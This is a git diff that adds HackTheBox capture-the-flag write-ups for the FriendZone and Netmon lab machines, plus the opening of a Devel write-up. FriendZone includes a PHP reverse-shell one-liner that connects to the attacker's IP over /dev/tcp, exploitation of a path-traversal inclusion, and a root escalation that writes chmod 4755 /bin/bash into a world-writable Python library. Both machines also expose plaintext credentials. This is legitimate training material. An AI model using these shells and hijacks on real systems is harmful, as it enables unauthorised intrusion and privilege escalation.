+
+ Nmap done: 1 IP address (1 host up) scanned in 6.85 seconds
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → nmap -sC -sV 10.10.10.123 -p 21,22,53,80,139,443,445
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-07 09:05 CET
+ Nmap scan report for 10.10.10.123
+ Host is up (0.036s latency).
+
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp vsftpd 3.0.3
+ 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
+ | 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
+ |_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
+ 53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
+ | dns-nsid:
+ |_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
+ 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
+ |_http-server-header: Apache/2.4.29 (Ubuntu)
+ |_http-title: Friend Zone Escape software
+ 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
+ 443/tcp open ssl/http Apache httpd 2.4.29
+ |_http-server-header: Apache/2.4.29 (Ubuntu)
+ |_http-title: 404 Not Found
+ | ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
+ | Not valid before: 2018-10-05T21:02:30
+ |_Not valid after: 2018-11-04T21:02:30
+ |_ssl-date: TLS randomness does not represent time
+ | tls-alpn:
+ |_ http/1.1
+ 445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
+ Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Host script results:
+ |_clock-skew: mean: -39m30s, deviation: 1h09m16s, median: 28s
+ |_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <****unknown>, NetBIOS MAC: <****unknown> (unknown)
+ | smb-os-discovery:
+ | OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
+ | Computer name: friendzone
+ | NetBIOS computer name: FRIENDZONE\x00
+ | Domain name: \x00
+ | FQDN: friendzone
+ |_ System time: 2019-12-07T10:06:20+02:00
+ | smb-security-mode:
+ | account_used: guest
+ | authentication_level: user
+ | challenge_response: supported
+ |_ message_signing: disabled (dangerous, but default)
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled but not required
+ | smb2-time:
+ | date: 2019-12-07T08:06:20
+ |_ start_date: N/A
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 28.42 seconds
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up the samba service running on both port 139 and 445. So we run the smb map command with it's -H flag in order to enumerate the shares we can work with.
+
+
+ λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → smbmap -H 10.10.10.123 -p 445,139
+ /bin/smbmap:1036: SyntaxWarning: "is" with a literal. Did you mean "=="?
+ if len(sys.argv) is 1:
+ [+] Finding open SMB ports....
+ [!] Authentication error on 10.10.10.123
+
+
+Seems like smbmap has got some problems on archlabs, but no worries, enum4linux is there to the rescue.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → enum4linux 10.10.10.123
+ Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Dec 7 09:12:14 2019
+
+ ==========================
+ | Target Information |
+ ==========================
+ Target ........... 10.10.10.123
+ RID Range ........ 500-550,1000-1050
+ Username ......... ''
+ Password ......... ''
+ Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
+
+
+ ====================================================
+ | Enumerating Workgroup/Domain on 10.10.10.123 |
+ ====================================================
+ Can't load /etc/samba/smb.conf - run testparm to debug it
+ [+] Got domain/workgroup name: WORKGROUP
+
+ ============================================
+ | Nbtstat Information for 10.10.10.123 |
+ ============================================
+ Can't load /etc/samba/smb.conf - run testparm to debug it
+ Looking up status of 10.10.10.123
+ FRIENDZONE <****00> - B <****ACTIVE> Workstation Service
+ FRIENDZONE <****03> - B <****ACTIVE> Messenger Service
+ FRIENDZONE <****20> - B <****ACTIVE> File Server Service
+ ..__MSBROWSE__. <****01> - <****GROUP> B <****ACTIVE> Master Browser
+ WORKGROUP <****00> - <****GROUP> B <****ACTIVE> Domain/Workgroup Name
+ WORKGROUP <****1d> - B <****ACTIVE> Master Browser
+ WORKGROUP <****1e> - <****GROUP> B <****ACTIVE> Browser Service Elections
+
+ MAC Address = 00-00-00-00-00-00
+
+ =====================================
+ | Session Check on 10.10.10.123 |
+ =====================================
+ [+] Server 10.10.10.123 allows sessions using username '', password ''
+
+ ===========================================
+ | Getting domain SID for 10.10.10.123 |
+ ===========================================
+ Unable to initialize messaging context
+ rpcclient: Can't load /etc/samba/smb.conf - run testparm to debug it
+ [+] Can't determine if host is part of domain or part of a workgroup
+
+ ======================================
+ | OS information on 10.10.10.123 |
+ ======================================
+ Use of uninitialized value $os_info in concatenation (.) or string at /usr/bin/enum4linux line 464.
+ [+] Got OS info for 10.10.10.123 from smbclient:
+ [+] Got OS info for 10.10.10.123 from srvinfo:
+ Unable to initialize messaging context
+ rpcclient: Can't load /etc/samba/smb.conf - run testparm to debug it
+
+ =============================
+ | Users on 10.10.10.123 |
+ =============================
+ Use of uninitialized value $users in print at /usr/bin/enum4linux line 874.
+ Use of uninitialized value $users in pattern match (m//) at /usr/bin/enum4linux line 877.
+
+ Use of uninitialized value $users in print at /usr/bin/enum4linux line 888.
+ Use of uninitialized value $users in pattern match (m//) at /usr/bin/enum4linux line 890.**=========================================
+ | Share Enumeration on 10.10.10.123 |
+ =========================================
+ Unable to initialize messaging context
+ smbclient: Can't load /etc/samba/smb.conf - run testparm to debug it
+
+ Sharename Type Comment
+ --------- ---- -------
+ print$ Disk Printer Drivers
+ Files Disk FriendZone Samba Server Files /etc/Files
+ general Disk FriendZone Samba Server Files
+ Development Disk FriendZone Samba Server Files
+ IPC$ IPC IPC Service (FriendZone server (Samba, Ubuntu))
+ Reconnecting with SMB1 for workgroup listing.
+
+ Server Comment
+ --------- -------
+
+ Workgroup Master
+ --------- -------
+ WORKGROUP FRIENDZONE
+
+ [+] Attempting to map shares on 10.10.10.123
+ //10.10.10.123/print$ Mapping: DENIED, Listing: N/A
+ //10.10.10.123/Files Mapping: DENIED, Listing: N/A
+ //10.10.10.123/general Mapping: OK, Listing: OK
+ //10.10.10.123/Development Mapping: OK, Listing: OK
+ //10.10.10.123/IPC$ [E] Can't understand response:
+ Unable to initialize messaging context
+ smbclient: Can't load /etc/samba/smb.conf - run testparm to debug it
+ NT_STATUS_OBJECT_NAME_NOT_FOUND listing \***
+ ====================================================
+ | Password Policy Information for 10.10.10.123 |
+ ====================================================
+ [E] Unexpected error from polenum:
+ Traceback (most recent call last):
+ File "/usr/bin/polenum", line 16, in <****module>
+ from impacket.dcerpc.v5.rpcrt import DCERPC_v5
+ ImportError: No module named impacket.dcerpc.v5.rpcrt
+ [+] Retieved partial password policy with rpcclient:
+
+
+
+ ==============================
+ | Groups on 10.10.10.123 |
+ ==============================
+
+ [+] Getting builtin groups:
+
+ [+] Getting builtin group memberships:
+
+ [+] Getting local groups:
+
+ [+] Getting local group memberships:
+
+ [+] Getting domain groups:
+
+ [+] Getting domain group memberships:
+
+ =======================================================================
+ | Users on 10.10.10.123 via RID cycling (RIDS: 500-550,1000-1050) |
+ =======================================================================
+
+ =============================================
+ | Getting printer info for 10.10.10.123 |
+ =============================================
+ Unable to initialize messaging context
+ rpcclient: Can't load /etc/samba/smb.conf - run testparm to debug it
+
+
+ enum4linux complete on Sat Dec 7 09:12:20 2019
+
+Looking at the results, we have a few ports to work with. Let's check out the shares available for us using the smbclient command.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → smbclient \\\\10.10.10.123\\general
+ Unable to initialize messaging context
+ smbclient: Can't load /etc/samba/smb.conf - run testparm to debug it
+ Enter WORKGROUP\nihilist's password:
+ Try "help" to get a list of possible commands.
+ smb: \> ls
+ . D 0 Wed Jan 16 21:10:51 2019
+ .. D 0 Wed Jan 23 22:51:02 2019
+ creds.txt N 57 Wed Oct 10 01:52:42 2018
+
+ 9221460 blocks of size 1024. 6459232 blocks available
+ smb: \> get creds.txt
+ getting file \creds.txt of size 57 as creds.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
+ smb: \> exit
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → mv creds.txt Friendzone/creds.txt
+ mv: cannot move 'creds.txt' to 'Friendzone/creds.txt': No such file or directory
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → mkdir Friendzone
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → mv creds.txt Friendzone/creds.txt
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → cd Friendzone
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Friendzone ]
+ → cat creds.txt
+ creds for the admin THING:
+
+ admin:WORKWORKHhallelujah@#
+
+
+We seem to have a password to work with ! WORKWORKHhallelujah@# Now let's use nmap's smb share enumeration script.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Friendzone ]
+ → nmap 10.10.10.123 --script smb-enum-shares
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-07 09:39 CET
+ Nmap scan report for 10.10.10.123
+ Host is up (0.043s latency).
+ Not shown: 993 closed ports
+ PORT STATE SERVICE
+ 21/tcp open ftp
+ 22/tcp open ssh
+ 53/tcp open domain
+ 80/tcp open http
+ 139/tcp open netbios-ssn
+ 443/tcp open https
+ 445/tcp open microsoft-ds
+
+ Host script results:
+ | smb-enum-shares:
+ | account_used: guest
+ | \\10.10.10.123\Development:
+ | Type: STYPE_DISKTREE
+ | Comment: FriendZone Samba Server Files
+ | Users: 0
+ | Max Users: <****unlimited>
+ | Path: C:\etc\Development
+ | Anonymous access: READ/WRITE
+ | Current user access: READ/WRITE
+ | \\10.10.10.123\Files:
+ | Type: STYPE_DISKTREE
+ | Comment: FriendZone Samba Server Files /etc/Files
+ | Users: 0
+ | Max Users: <****unlimited>
+ | Path: C:\etc\hole
+ | Anonymous access: <****none>
+ | Current user access: <****none>
+ | \\10.10.10.123\IPC$:
+ | Type: STYPE_IPC_HIDDEN
+ | Comment: IPC Service (FriendZone server (Samba, Ubuntu))
+ | Users: 1
+ | Max Users: <****unlimited>
+ | Path: C:\tmp
+ | Anonymous access: READ/WRITE
+ | Current user access: READ/WRITE
+ | \\10.10.10.123\general:
+ | Type: STYPE_DISKTREE
+ | Comment: FriendZone Samba Server Files
+ | Users: 0
+ | Max Users: <****unlimited>
+ | Path: C:\etc\general
+ | Anonymous access: READ/WRITE
+ | Current user access: READ/WRITE
+ | \\10.10.10.123\print$:
+ | Type: STYPE_DISKTREE
+ | Comment: Printer Drivers
+ | Users: 0
+ | Max Users: <****unlimited>
+ | Path: C:\var\lib\samba\printers
+ | Anonymous access: <****none>
+ |_ Current user access: <****none>
+
+ Nmap done: 1 IP address (1 host up) scanned in 10.82 seconds
+
+Browsing to the 80th port, we are greeted with a simple html page with a picture. Although we are hinted towards domain name resolution at the bottom, so let's see what lies at the https port in order to see if we can enumerate the DNS part of this box a little further using the SSL certificate.
+
+  
+
+Seems like we have a hostname to work with : friendzone.red let's do a quick dns lookup using the dig command.
+
+
+
+ λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → pacman -S blackarch/python2-dnsknife
+
+ λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → dig axfr @10.10.10.123 friendzone.red
+
+ ; <<>> DiG 9.14.8 <<>> axfr @10.10.10.123 friendzone.red
+ ; (1 server found)
+ ;; global options: +cmd
+ friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
+ friendzone.red. 604800 IN AAAA ::1
+ friendzone.red. 604800 IN NS localhost.
+ friendzone.red. 604800 IN A 127.0.0.1
+ administrator1.friendzone.red. 604800 IN A 127.0.0.1
+ hr.friendzone.red. 604800 IN A 127.0.0.1
+ uploads.friendzone.red. 604800 IN A 127.0.0.1
+ friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
+ ;; Query time: 39 msec
+ ;; SERVER: 10.10.10.123#53(10.10.10.123)
+ ;; WHEN: Sat Dec 07 10:13:25 CET 2019
+ ;; XFR size: 8 records (messages 1, bytes 289)
+
+
+Looking at the results, we seem to have found administrator1.friendzone.red and uploads.friendzone.red . Since HackTheBox doesn't do DNS we'll add the following line into our /etc/hosts file :
+
+
+ 10.10.10.123 administrator1.friendzone.red uploads.friendzone.red
+
+
+Browsing to the administrator1.friendzone.red URI we are greeted by a login prompt.
+
+
+
+Using the credentials we found earlier, we are able to login :
+
+
+
+Earlier our enum4linux scan picked up the Development SMB Share :
+
+
+ λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → smbclient -H //10.10.10.123/Development
+ Unable to initialize messaging context
+ smbclient: Can't load /etc/samba/smb.conf - run testparm to debug it
+ Enter WORKGROUP\nihilist's password:
+ Try "help" to get a list of possible commands.
+ smb: \> ls
+ . D 0 Sat Dec 7 09:40:17 2019
+ .. D 0 Wed Jan 23 22:51:02 2019
+
+
+This is where we will upload our reverse php shell, just pick up a quick oneliner for us to use and upload it :
+
+
+ <****?php
+ echo("nihilist WAS HERE");
+ exec("/bin/bash -c 'bash -i > & /dev/tcp/10.10.14.48/9001 0>&1'");
+
+
+
+ smb: \> put nihilist_rev.php
+ putting file nihilist_rev.php as \nihilist_rev.php (0.9 kb/s) (average 0.9 kb/s)
+ smb: \> ls
+ . D 0 Sat Dec 7 10:38:01 2019
+ .. D 0 Wed Jan 23 22:51:02 2019
+ nihilist_rev.php A 101 Sat Dec 7 10:38:02 2019
+
+ 9221460 blocks of size 1024. 6460304 blocks available
+
+ smb: \> exit
+
+ λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → nc -lvnp 9001
+
+
+Once the reverse shell is uploaded, we ready our terminal with the nc command in order to catch the incoming reverse shell connection onto our 9001st port. Then we browse to our reverse php shell from within the webbrowser and see the result :
+
+
+ https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename;=../../../../../../../../../etc/Development/nihilist_rev.php
+
+
+This does not work because the URI must not end with .php ! So you need to browse to this URI :
+
+
+ https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename;=../../../../../../../../../etc/Development/nihilist_rev
+
+
+And see that our terminal catched the reverse shell connection.
+
+
+ λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → nc -lvnp 9001
+ Connection from 10.10.10.123:58526
+ bash: cannot set terminal process group (556): Inappropriate ioctl for device
+ bash: no job control in this shell
+
+ www-data@FriendZone:/var/www/admin$ uname -a
+ uname -a
+ Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+
+ www-data@FriendZone:/var/www/admin$ whoami
+ whoami
+ www-data
+
+
+And that's it ! we have been able to login as www-data, now let's see if we have enough permissions to print out the user flag.
+
+
+ www-data@FriendZone:/var/www/admin$ cd /home
+ cd /home
+
+ www-data@FriendZone:/home$ ls
+ ls
+ friend
+
+ www-data@FriendZone:/home$ cd friend
+ cd friend
+ www-data@FriendZone:/home/friend$ ls
+ ls
+ user.txt
+
+ www-data@FriendZone:/home/friend$ cat user.txt
+ cat user.txt
+ a9XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now we need to escalate privileges onto the machine. To do so, let's first take a look at the mysql_data.conf file located in /var/www.
+
+
+ www-data@FriendZone:/home/friend$ cd /var/www
+ cd /var/www
+ www-data@FriendZone:/var/www$ ls
+ ls
+ admin
+ friendzone
+ friendzoneportal
+ friendzoneportaladmin
+ html
+ mysql_data.conf
+ uploads
+ www-data@FriendZone:/var/www$ cat mysql_data.conf
+ cat mysql_data.conf
+ for development process this is the mysql creds for user friend
+
+ db_user=friend
+
+ db_pass=Agpyu12!0.213$
+
+ db_name=FZ
+
+
+seems like we have credentials to work with ! friend:Agpyu12!0.213$ let's try to privesc using the su command.
+
+
+ www-data@FriendZone:/var/www$ su friend
+ su friend
+ su: must be run from a terminal
+
+ www-data@FriendZone:/var/www$ which python
+ which python
+ /usr/bin/python
+
+
+That's not a problem, we should be able to fool the system into thinking we are running commands from a TTY session, by using python's pty module.
+
+
+ www-data@FriendZone:/var/www$ python -c 'import pty; pty.spawn("/bin/sh")'
+ python -c 'import pty; pty.spawn("/bin/sh")'
+
+ $ su friend
+ su friend
+ Password: Agpyu12!0.213$
+
+ friend@FriendZone:/var/www$ whoami
+ whoami
+ friend
+
+
+Now let's take a look into the /opt directory. There seems to be an interesting folder for us to look into :
+
+
+ friend@FriendZone:/var/www$ cd /opt
+ cd /opt
+ friend@FriendZone:/opt$ ls
+ ls
+ server_admin
+ friend@FriendZone:/opt$ ls -la
+ ls -la
+ total 12
+ drwxr-xr-x 3 root root 4096 Oct 6 2018 .
+ drwxr-xr-x 22 root root 4096 Oct 5 2018 ..
+ drwxr-xr-x 2 root root 4096 Jan 24 2019 server_admin
+ friend@FriendZone:/opt$ cd server_admin
+ cd server_admin
+ friend@FriendZone:/opt/server_admin$ ls
+ ls
+ reporter.py
+ friend@FriendZone:/opt/server_admin$ cat reporter.py
+ cat reporter.py
+ #!/usr/bin/python
+
+ import os
+
+ to_address = "admin1@friendzone.com"
+ from_address = "admin2@friendzone.com"
+
+ print "[+] Trying to send email to %s"%to_address
+
+ #command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''
+
+ #os.system(command)
+
+ # I need to edit the script later
+ # Sam ~ python developer
+ friend@FriendZone:/opt/server_admin$
+
+
+Seems like the python script is importing a library named "os", let's see if we can enumerate it.
+
+
+ friend@FriendZone:/opt/server_admin$ ls -ld /usr/lib/python2.7/os.py
+ ls -ld /usr/lib/python2.7/os.py
+ -rwxrwxrwx 1 root root 25910 Jan 15 2019 /usr/lib/python2.7/os.py
+
+
+Whoa ! The os.py libary has got the 777 permissions, This is a serious security flaw as we're about to demonstrate :
+
+
+ friend@FriendZone:/opt/server_admin$ echo "system('chmod 4755 /bin/bash')" >> /usr/lib/python2.7/os.py
+ echo "system('chmod 4755 /bin/bash')" >> /usr/lib/python2.7/os.py
+ friend@FriendZone:/opt/server_admin$ ^[[A^[[A
+ friend@FriendZone:/opt/server_admin$ ls -l /bin/bash
+ -rwxr-xr-x 1 root root 1113504 Apr 4 2018 /bin/bash
+
+
+Wait a little while for the cronjob to execute the python script, and you should see the permissions of /bin/bash changing.
+
+
+ friend@FriendZone:/opt/server_admin$ ^[[A
+ ls -l /bin/bash
+ -rwsr-xr-x 1 root root 1113504 Apr 4 2018 /bin/bash
+ friend@FriendZone:/opt/server_admin$ /bin/bash -p
+ /bin/bash -p
+ bash-4.4# whoami
+ whoami
+ root
+ bash-4.4# cat /root/root.txt
+ cat /root/root.txt
+ b0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/29.md b/Easy/29.md
new file mode 100644
index 0000000..5d75fbc
--- /dev/null
+++ b/Easy/29.md
@@ -0,0 +1,267 @@
+# Netmon Writeup
+
+
+
+## Introduction :
+
+Netmon is an easy Windows box that was released back in March 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → nmap -F 10.10.10.152 --top-ports 10000
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-09 08:36 CET
+ Nmap scan report for 10.10.10.152
+ Host is up (0.037s latency).
+ Not shown: 8313 closed ports
+ PORT STATE SERVICE
+ 21/tcp open ftp
+ 80/tcp open http
+ 135/tcp open msrpc
+ 139/tcp open netbios-ssn
+ 445/tcp open microsoft-ds
+ 5985/tcp open wsman
+ 47001/tcp open winrm
+
+ Nmap done: 1 IP address (1 host up) scanned in 6.13 seconds
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → nmap -sCV -p21,80,135,139,445,5985,47001 10.10.10.152
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-09 08:36 CET
+ Nmap scan report for 10.10.10.152
+ Host is up (0.035s latency).
+
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp Microsoft ftpd
+ | ftp-anon: Anonymous FTP login allowed (FTP code 230)
+ | 02-02-19 11:18PM 1024 .rnd
+ | 02-25-19 09:15PM <****DIR> inetpub
+ | 07-16-16 08:18AM <****DIR> PerfLogs
+ | 02-25-19 09:56PM <****DIR> Program Files
+ | 02-02-19 11:28PM <****DIR> Program Files (x86)
+ | 02-03-19 07:08AM <****DIR> Users
+ |_02-25-19 10:49PM <****DIR> Windows
+ | ftp-syst:
+ |_ SYST: Windows_NT
+ 80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
+ |_http-server-header: PRTG/18.1.37.13946
+ | http-title: Welcome | PRTG Network Monitor (NETMON)
+ |_Requested resource was /index.htm
+ |_http-trane-info: Problem with XML parsing of /evox/about
+ 135/tcp open msrpc Microsoft Windows RPC
+ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+ 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
+ 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
+ |_http-server-header: Microsoft-HTTPAPI/2.0
+ |_http-title: Not Found
+ 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
+ |_http-server-header: Microsoft-HTTPAPI/2.0
+ |_http-title: Not Found
+ Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: mean: 31s, deviation: 0s, median: 30s
+ |_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
+ | smb-security-mode:
+ | authentication_level: user
+ | challenge_response: supported
+ |_ message_signing: disabled (dangerous, but default)
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled but not required
+ | smb2-time:
+ | date: 2019-12-09T07:37:33
+ |_ start_date: 2019-12-09T07:33:41
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 20.27 seconds
+
+## **Part 2 : Getting User Access**
+
+Looking at the results, we see that ftp allows us to login as the user account , so we login using the default credentials (anonymous:anonymous:)
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → ftp 10.10.10.152
+ Connected to 10.10.10.152.
+ 220 Microsoft FTP Service
+ Name (10.10.10.152:nihilist): anonymous
+ 331 Anonymous access allowed, send identity (e-mail name) as password.
+ Password:
+ 230 User logged in.
+ Remote system type is Windows_NT.
+ ftp> ls
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 02-02-19 11:18PM 1024 .rnd
+ 02-25-19 09:15PM <****DIR> inetpub
+ 07-16-16 08:18AM <****DIR> PerfLogs
+ 02-25-19 09:56PM <****DIR> Program Files
+ 02-02-19 11:28PM <****DIR> Program Files (x86)
+ 02-03-19 07:08AM <****DIR> Users
+ 02-25-19 10:49PM <****DIR> Windows
+ 226 Transfer complete.
+ ftp> cd Users
+ 250 CWD command successful.
+ ftp> ls
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 02-25-19 10:44PM <****DIR> Administrator
+ 02-02-19 11:35PM <****DIR> Public
+ 226 Transfer complete.
+ ftp> cd Public
+ 250 CWD command successful.
+ ftp> ls
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 02-03-19 07:05AM <****DIR> Documents
+ 07-16-16 08:18AM <****DIR> Downloads
+ 07-16-16 08:18AM <****DIR> Music
+ 07-16-16 08:18AM <****DIR> Pictures
+ 02-02-19 11:35PM 33 user.txt
+ 07-16-16 08:18AM <****DIR> Videos
+ 226 Transfer complete.
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ WARNING! 1 bare linefeeds received in ASCII mode
+ File may not have transferred correctly.
+ 226 Transfer complete.
+ 33 bytes received in 0.0344 seconds (958 bytes/s)
+ ftp> quit
+ 221 Goodbye.
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → cat user.txt
+ ddXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+And that's it ! we have the user flag.
+
+## **Part 3 : Getting Root Access**
+
+In order to find the root flag, we need to enumerate a little bit what lies inside the /ProgramData folder.
+
+
+ ftp> cd /ProgramData
+ 250 CWD command successful.
+ ftp> dir
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 02-02-19 11:15PM <****DIR> Licenses
+ 11-20-16 09:36PM <****DIR> Microsoft
+ 02-02-19 11:18PM <****DIR> Paessler
+ 02-03-19 07:05AM <****DIR> regid.1991-06.com.microsoft
+ 07-16-16 08:18AM <****DIR> SoftwareDistribution
+ 02-02-19 11:15PM <****DIR> TEMP
+ 11-20-16 09:19PM <****DIR> USOPrivate
+ 11-20-16 09:19PM <****DIR> USOShared
+ 02-25-19 09:56PM <****DIR> VMware
+ 226 Transfer complete.
+ ftp> cd Paessler
+ 250 CWD command successful.
+ ftp> dir
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 12-09-19 02:35AM <****DIR> PRTG Network Monitor
+ 226 Transfer complete.
+
+Interesting ! seems like there is a PRTG Service running, let's see if we can get anything out of it.
+
+
+ ftp> cd "PRTG Network Monitor"
+ 250 CWD command successful.
+ ftp> dir
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 02-02-19 11:40PM <****DIR> Configuration Auto-Backups
+ 12-09-19 02:34AM <****DIR> Log Database
+ 02-02-19 11:18PM <****DIR> Logs (Debug)
+ 02-02-19 11:18PM <****DIR> Logs (Sensors)
+ 02-02-19 11:18PM <****DIR> Logs (System)
+ 12-09-19 02:34AM <****DIR> Logs (Web Server)
+ 02-25-19 07:01PM <****DIR> Monitoring Database
+ 02-25-19 09:54PM 1189697 PRTG Configuration.dat
+ 02-25-19 09:54PM 1189697 PRTG Configuration.old
+ 07-14-18 02:13AM 1153755 PRTG Configuration.old.bak
+ 12-09-19 02:35AM 1647616 PRTG Graph Data Cache.dat
+ 02-25-19 10:00PM <****DIR> Report PDFs
+ 02-02-19 11:18PM <****DIR> System Information Database
+ 02-02-19 11:40PM <****DIR> Ticket Database
+ 02-02-19 11:18PM <****DIR> ToDo Database
+ 226 Transfer complete.
+ ftp>
+
+Looks like we have a few configuration files to work with, let's save the "PRTG Configuration.old.bak" one locally and see if we can get anything out of it.
+
+
+ ftp> get "PRTG Configuration.old.bak'
+ 200 PORT command successful.
+ 550 The system cannot find the file specified.
+ ftp> get "PRTG Configuration.old.bak"
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 226 Transfer complete.
+ 1153755 bytes received in 0.516 seconds (2.13 Mbytes/s)
+ ftp> quit
+ 221 Goodbye.
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Netmon ]
+ →nano PRTG\ Configuration.old.bak
+
+
+
+ <****dbpassword> <****!-- User: prtgadmin -->
+ PrTg@dmin2018 <****/dbpassword>
+
+And we have unencrypted credentials ! Let's see if we can use them somewhere.
+
+
+
+Of course these are the old credentials, so let's update the password to : **PrTg@dmin2019**
+
+
+
+And we are logged in ! now let's navigate to the Notifications page, into the "Executing Program" tab, where the command injection vulnerability is located.
+
+
+
+Once the infected notification is created, execute it and check out the ftp C:/Users/Public directory once again.
+
+
+
+
+ ftp> ls
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 02-03-19 07:05AM <****DIR> Documents
+ 07-16-16 08:18AM <****DIR> Downloads
+ 07-16-16 08:18AM <****DIR> Music
+ 07-16-16 08:18AM <****DIR> Pictures
+ 02-02-19 11:35PM 33 user.txt
+ 02-02-19 11:35PM 33 nihilist.txt
+ 07-16-16 08:18AM <****DIR> Videos
+ 226 Transfer complete.
+ ftp> get nihilist.txt
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ WARNING! 1 bare linefeeds received in ASCII mode
+ File may not have transferred correctly.
+ 226 Transfer complete.
+ 33 bytes received in 0.0438 seconds (754 bytes/s)
+ ftp> quit
+ 221 Goodbye.
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Netmon ]
+ → cat nihilist.txt
+ 30XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+And that's it ! we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/3.md b/Easy/3.md
new file mode 100644
index 0000000..cfe0ae3
--- /dev/null
+++ b/Easy/3.md
@@ -0,0 +1,241 @@
+# Devel Writeup
+
+
+
+## Introduction :
+
+Devel was an easy Windows box released back in March 2017.
+
